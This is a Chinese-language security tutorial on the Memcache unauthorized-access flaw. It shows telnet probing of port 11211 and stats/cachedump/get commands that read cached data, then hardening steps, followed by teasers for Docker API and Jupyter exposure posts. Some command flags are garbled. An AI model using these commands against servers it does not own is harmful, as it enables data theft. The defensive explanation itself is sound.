memcache是國外社群**live journal的開發團隊開發的高效能的分布式記憶體快取伺服器。
一般的使用目的是,通過快取資料庫查詢結果,減少資料庫訪問次數,以提高動態web應用的速度、提高擴充套件性。
memcache的預設埠是11211,不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊,造成嚴重的資訊洩露。
利用telnet 探測目標11211埠
telnet xx.xx.xx.xx 11211
無需使用者名稱密碼,可以直接鏈結memcache服務的11211埠。
stats //檢視memcache 服務狀態
stats items //檢視所有items
stats cachedump 32 0 //獲得快取key
get :state:264861539228401373:261588 //通過key讀取相應value ,獲得實際快取內容,造成敏感資訊洩露
使用treesoft資料庫管理系統連線memcache資料庫。
memcache無許可權控制功能,所以需要對訪問**進行限制。
1.配置訪問控制
建立iptables規則,只允許某一ip對memcache的埠進行訪問。
iptables -a input -p tcp -s 192.168.0.2 —dport 11211 -j accept
2.繫結監聽ip
memcache如果沒有開在外網的必要,可以在memcache啟動時繫結ip位址為127.0.0.1.
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -p /tmp/memcached.pid
3.最小化許可權執行
使用普通賬號執行,指定memcache使用者執行
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -p /tmp/memcached.pid
4.修改預設埠
修改預設11211監聽埠為其他埠
memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11222 -c 1024 -p /tmp/memcached.pid
5.備份資料
為避免資料丟失,公升級前做好備份,或ecs建立硬碟快照。
引數說明:
-d選項是啟動乙個守護程序;
-m是分配給memcached使用的記憶體數量,單位是mb;
-l是監聽的伺服器ip位址;
-p是設定memcached監聽的埠,最好是1024以上的埠;
-c選項是最大執行的併發連線數,預設是1024,按照你伺服器的負載量來設定;
-p是設定儲存memcached的pid檔案,這裡是儲存在 /tmp/memcached.pid;
Memcache未授權訪問漏洞
memcached 分布式快取系統,預設的 11211 埠不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊,造成嚴重的資訊洩露。0x00 memcache安裝 2 在cmd命令介面 下輸入 memcached.exe d install 進行安裝 3 啟動 memcached.exe d s...
Docker Remote API未授權訪問
0x00 漏洞原因dockerd h unix var run docker.sock h 0.0.0.0 2375 docker守護程序監聽在0.0.0.0,外網可訪問 沒有使用iptables等限制可連線的 ip0x01 漏洞利用 1.遠端對被攻擊的主機的docker容器進行操作 docker ...
Jupyter Notebook 未授權訪問漏洞
好好學習,天天向上 jupyter notebook 此前被稱為 ipython notebook 是乙個互動式筆記本,支援執行 40 多種程式語言。如果管理員未為jupyter notebook配置密碼,將導致未授權訪問漏洞,遊客可在其中建立乙個console並執行任意python 和命令。這裡使...